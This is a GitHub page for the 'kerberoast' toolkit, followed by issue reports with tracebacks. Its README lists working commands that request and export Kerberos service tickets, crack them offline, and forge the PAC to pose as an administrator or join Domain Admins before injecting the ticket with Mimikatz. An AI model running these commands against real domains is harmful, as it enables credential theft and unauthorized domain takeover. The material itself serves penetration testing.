nidem / kerberoast Goto Github PK

License: Apache License 2.0

Python 84.36% PowerShell 10.24% VBScript 5.40%

kerberoast's Introduction

kerberoast

Kerberoast is a series of tools for attacking MS Kerberos implementations. Below is a brief overview of what each tool does.

Extract all accounts in use as SPN using built in MS tools

PS C:\> setspn -T medin -Q */*

Request Ticket(s)

One ticket:

PS C:\> Add-Type -AssemblyName System.IdentityModel  
PS C:\> New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "HTTP/web01.medin.local"

All the tickets

PS C:\> Add-Type -AssemblyName System.IdentityModel  
PS C:\> setspn.exe -T medin.local -Q */* | Select-String '^CN' -Context 0,1 | % { New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $_.Context.PostContext[0].Trim() }

Extract the acquired tickets from ram with Mimikatz

mimikatz # kerberos::list /export

Crack with tgsrepcrack

./tgsrepcrack.py wordlist.txt 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi

Rewrite

Make user appear to be a different user

./kerberoast.py -p Password1 -r 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi -w sql.kirbi -u 500

Add user to another group (in this case Domain Admin)

./kerberoast.py -p Password1 -r 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi -w sql.kirbi -g 512

Inject back into RAM with Mimikatz

kerberos::ptt sql.kirbi

kerberoast's People

Contributors

Stargazers

Watchers

Forkers

mubix johnjohnsp1 gabtremblay nahidupa meatballs1 0x90shell carnal0wnage tuian dc3l1ne jinverar cplushua01 gabberbaby luciferoo xi4oyu kyodule lucabongiorni wflk izogain derduffy r13mann xan7r gitcollect marcwa19197 kurtdegreeff jc1396 dipsec h1d3r mlinton vysecurity caoimhinp opexxx jajp777 0v3rm1nd-dr4g0n cephurs yaoyi2008 olivierh59500 dreilly369 xyz6543210 p01ice thepeoplefoundation d4rker topotam vishnuraju quikilr jbarcia d-hutch jutazhu arryboom h0k5 johnwalk61 lhxkailiang firefalc0n simonelberts resourcemonitor111 brownbelt mabangde jamesshew mbrane dp4ng hackmycontrolsystem w00t3k capitaogancho therindor fingerleakers beep3r rakesh72 huntpig adrian207 seemantbisht magnusstubman booms007 shiham101 santosomar diggold zshell jinnu92 kyawthiha7 kumarankamalanathan juntian1983 orf53975 c002 ashr dannymas dr1ipr mmg1 virgilcj leomatias stacklikemind an4kein raystyle cwaazywabbit gdraperi besimaltnok 1warl0ck iraqnophobia thered fraabye pixelza attackgithub 0patch

kerberoast's Issues

Unknown error (0x80005000)

Exception calling "FindAll" with "0" argument(s): "Unknown error (0x80005000)"
At C:\SD\scripts\sc\user\GetUserSPNS.ps1:98 char:5

```
$results = $searcher.FindAll()
```
```
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
```
- CategoryInfo : NotSpecified: (:) [], MethodInvocationException
- FullyQualifiedErrorId : COMException

Python 2.x will no longer be supported by their upstream developers in 2020. Thus Debian developers are actively removing Python 2 support in Debian Testing with the goal of getting rid of Python 2 in Debian 11 (bullseye).

Since Kali Linux is based on Debian Testing, we have to follow along. And since kerberoast is part of Kali, we would like to have a version of kerberoast that works with Python 3.

All your dependencies are already available for Python 3 so there should be no real blockers.

Do you have plans to port kerberoast to Python 3 ?

Tracking bug in Kali: https://gitlab.com/kalilinux/packages/kerberoast/issues/1

Filter for only no-computer accounts

It'd be nice if there was a way in the powershell script to filter and pull only the the tickets that had non-computer objects assigned to them. I have been trying for a bit to get this to work but my powershell sucks.

'NoneType' object has no attribute 'encode'

root@kali:~/kerberoast# python kerberoast.py -v -r /root/xxx.kirbi -w /root/xxx2.kirbi -p xxx
NO MATCH!! Login Info
NOT SAME
0110[...snip...]0005

0110[...snip...]0000
----
Traceback (most recent call last):
  File "kerberoast.py", line 242, in <module>
    pac = pacobj.encode()
  File "/root/kerberoast/PAC.py", line 529, in encode
    pse = ps.encode()
AttributeError: 'NoneType' object has no attribute 'encode'

Linux kali 4.6.0-kali1-amd64 #1 SMP Debian 4.6.4-1kali1 (2016-07-21) x86_64 GNU/Linux

PRETTY_NAME="Kali GNU/Linux Rolling"
NAME="Kali GNU/Linux"
ID=kali
VERSION="2016.1"
VERSION_ID="2016.1"
ID_LIKE=debian
ANSI_COLOR="1;31"
HOME_URL="http://www.kali.org/"
SUPPORT_URL="http://forums.kali.org/"
BUG_REPORT_URL="http://bugs.kali.org/"

Python 2.7.12

Cannot encode ticket: AttributeError: 'GeneralizedTime' object has no attribute 'encode'

I am getting the following error when running this command on this ticket:

2-40a10000-Install@http~kerbtest.a.vm.net-A.VM.NET.kirbi.txt

python C:\kerberoast-master\kerberoast-master\kerberoast.py -p Password1 -r $fileName -w http.kirbi -u 500

PS C:\> python C:\kerberoast-master\kerberoast-master\kerberoast.py -p Password1 -r $fileName -w http.kirbi -u 500
NO MATCH!! UPN DNS Info
NOT SAME
2000100010003000010000000000000049006e007300740061006c006c00400061002e0076006d002e006e006500740041002e0056004d002e004e0045005400

2000100010003400010000000000000049006e007300740061006c006c00400061002e0076006d002e006e00650074000000000041002e0056004d002e004e00
----
python : Traceback (most recent call last):
At line:1 char:1
+ python C:\kerberoast-master\kerberoast-master\kerberoast.py -p Passwo ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (Traceback (most recent call last)::String) [], RemoteException
    + FullyQualifiedErrorId : NativeCommandError
 
  File "C:\kerberoast-master\kerberoast-master\kerberoast.py", line 243, in <module>
    newticket = updatepac(key, fullraw, pac)
  File "C:\kerberoast-master\kerberoast-master\kerberoast.py", line 161, in updatepac
    newencserverticket = kerberos.encrypt(key, 2, encoder.encode(decserverticket), nonce)
  File "C:\Python27\lib\site-packages\pyasn1\codec\ber\encoder.py", line 663, in __call__
    substrate = concreteEncoder.encode(value, asn1Spec, self, **options)
  File "C:\Python27\lib\site-packages\pyasn1\codec\ber\encoder.py", line 85, in encode
    value, asn1Spec, encodeFun, **options
  File "C:\Python27\lib\site-packages\pyasn1\codec\ber\encoder.py", line 450, in encodeValue
    chunk = encodeFun(component, asn1Spec, **options)
  File "C:\Python27\lib\site-packages\pyasn1\codec\ber\encoder.py", line 663, in __call__
    substrate = concreteEncoder.encode(value, asn1Spec, self, **options)
  File "C:\Python27\lib\site-packages\pyasn1\codec\ber\encoder.py", line 85, in encode
    value, asn1Spec, encodeFun, **options
  File "C:\Python27\lib\site-packages\pyasn1\codec\ber\encoder.py", line 185, in encodeValue
    substrate = value.asOctets()
  File "C:\Python27\lib\site-packages\pyasn1\type\char.py", line 84, in asOctets
    return str(self)
  File "C:\Python27\lib\site-packages\pyasn1\type\char.py", line 55, in __str__
    return self._value.encode(self.encoding)
AttributeError: 'GeneralizedTime' object has no attribute 'encode'

kirbi2john

kirbi2john seems to break JtR ability to read the output correctly.

".kirbi" files dumped from mimikatz

$krb5tgs$2-40a10000-xor-app59$@MSSQLSvc~xor-app23.xor.com~1433-XOR.COM.kirbi:c2a26d7ec38e49393fc2a91fc2b322c3a1c2bfc3bec39414$c38ac28cc3bc10c3897bc29046c3a772560ac396c29831c280c3a63b4bc29a09c29866c3974fc29ec28dc385c29d34c2b936c2b77f2b0228c39f065cc39bc29503c293c3bdc285c3bfc2bf05c3abc39c30c2ab08c3934bc38ac2b47b31266cc..

shortened for brevity. it's really the first part that seems like it's wrong, you can see the .kirbi at the end there

"$krb5tgs$2-40a10000-xor-app59$@MSSQLSvc~xor-app23.xor.com~1433-XOR.COM.kirbi:c2"

Running John

I know that this is sort of the old school way of doing things (downloading the tickets with mimikatz) but I'd like to be able to do both

On the flipside Invoke-Kerberoast as it stands with Empire outputs a correct hash formatted for John or Hashcat

Rewrite error

when i try Rewrite

what happend?

UnicodeDecodeError

I'm getting the following error when trying to crack the kirbi file:

root@kali:~/kerberoast$ python tgsrepcrack.py 1-xxx.COM.kirbi /pentest/dictionaries/bigpicch.txt
Process Process-1:
Traceback (most recent call last):
  File "/usr/lib/python2.7/multiprocessing/process.py", line 258, in _bootstrap
    self.run()
  File "/usr/lib/python2.7/multiprocessing/process.py", line 114, in run
    self._target(*self._args, **self._kwargs)
  File "tgsrepcrack.py", line 16, in loadwordlist
    wordlistqueue.put(w.decode('utf-8').strip(), True)
  File "/usr/lib/python2.7/encodings/utf_8.py", line 16, in decode
    return codecs.utf_8_decode(input, errors, True)
UnicodeDecodeError: 'utf8' codec can't decode byte 0x82 in position 1: invalid start byte
All tickets cracked!

wordlist.txt

Hi,
what does that wordlist file contain? does it contain the hashes of the commonly used passwords? can you please provide us the wordlist file? or do we need to create our own?

./tgsrepcrack.py wordlist.txt

Thanks. Much appreciated.

root@kali:~/Desktop/CTF# ./tgsrepcrack.py wordlist.txt tgs.kirbi 
Traceback (most recent call last):
  File "./tgsrepcrack.py", line 71, in <module>
    for f in glob.glob(path):
  File "/usr/lib/python3.8/glob.py", line 21, in glob
    return list(iglob(pathname, recursive=recursive))
  File "/usr/lib/python3.8/glob.py", line 42, in _iglob
    dirname, basename = os.path.split(pathname)
  File "/usr/lib/python3.8/posixpath.py", line 103, in split
    p = os.fspath(p)
TypeError: expected str, bytes or os.PathLike object, not _io.TextIOWrapper
^CError in atexit._run_exitfuncs:
Traceback (most recent call last):
  File "/usr/lib/python3.8/multiprocessing/popen_fork.py", line 27, in poll
    pid, sts = os.waitpid(self.pid, flag)
KeyboardInterrupt

If I leave it running for a little longer before interrupting with Ctrl+C the error looks like this:

root@kali:~/Desktop/CTF# ./tgsrepcrack.py wordlist.txt tgs.kirbi 
Traceback (most recent call last):
  File "./tgsrepcrack.py", line 71, in <module>
    for f in glob.glob(path):
  File "/usr/lib/python3.8/glob.py", line 21, in glob
    return list(iglob(pathname, recursive=recursive))
  File "/usr/lib/python3.8/glob.py", line 42, in _iglob
    dirname, basename = os.path.split(pathname)
  File "/usr/lib/python3.8/posixpath.py", line 103, in split
    p = os.fspath(p)
TypeError: expected str, bytes or os.PathLike object, not _io.TextIOWrapper
^CError in atexit._run_exitfuncs:
Traceback (most recent call last):
  File "/usr/lib/python3.8/multiprocessing/popen_fork.py", line 27, in poll
    pid, sts = os.waitpid(self.pid, flag)
KeyboardInterrupt
Process Process-1:
Traceback (most recent call last):
  File "/usr/lib/python3.8/multiprocessing/process.py", line 315, in _bootstrap
    self.run()
  File "/usr/lib/python3.8/multiprocessing/process.py", line 108, in run
    self._target(*self._args, **self._kwargs)
  File "./tgsrepcrack.py", line 16, in loadwordlist
    wordlistqueue.put(w.decode('utf-8').strip(), True)
UnicodeDecodeError: 'utf-8' codec can't decode byte 0xf1 in position 5: invalid continuation byte

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/lib/python3.8/multiprocessing/process.py", line 318, in _bootstrap
    util._exit_function()
  File "/usr/lib/python3.8/multiprocessing/util.py", line 337, in _exit_function
    _run_finalizers()
  File "/usr/lib/python3.8/multiprocessing/util.py", line 277, in _run_finalizers
    finalizer()
  File "/usr/lib/python3.8/multiprocessing/util.py", line 201, in __call__
    res = self._callback(*self._args, **self._kwargs)
  File "/usr/lib/python3.8/multiprocessing/queues.py", line 195, in _finalize_join
    thread.join()
  File "/usr/lib/python3.8/threading.py", line 1011, in join
    self._wait_for_tstate_lock()
  File "/usr/lib/python3.8/threading.py", line 1027, in _wait_for_tstate_lock
    elif lock.acquire(block, timeout):
KeyboardInterrupt

tgsrepcrack error

Hello,
I get this error with tgsrepcrack

root@kali:~/Desktop/CTF# ./tgsrepcrack.py /usr/share/wordlists/rockyou.txt tgs.kirbi 
Traceback (most recent call last):
  File "./tgsrepcrack.py", line 46, in <module>
    metavar='dictionary.txt', type=file, # windows closes it in thread
NameError: name 'file' is not defined

I'm using the latest version. (Downloaded today April 24th)

Receiving the following when starting tgsrepcrack

Process Process-1:
Traceback (most recent call last):
  File "/usr/lib/python2.7/multiprocessing/process.py", line 258, in _bootstrap
    self.run()
  File "/usr/lib/python2.7/multiprocessing/process.py", line 114, in run
    self._target(*self._args, **self._kwargs)
  File "tgsrepcrack.py", line 16, in loadwordlist
    wordlistqueue.put(w.decode('utf-8').strip(), True)
  File "/usr/lib/python2.7/encodings/utf_8.py", line 16, in decode
    return codecs.utf_8_decode(input, errors, True)
UnicodeDecodeError: 'utf8' codec can't decode byte 0x93 in position 1: invalid start byte

Does this mean that the ticket is bad?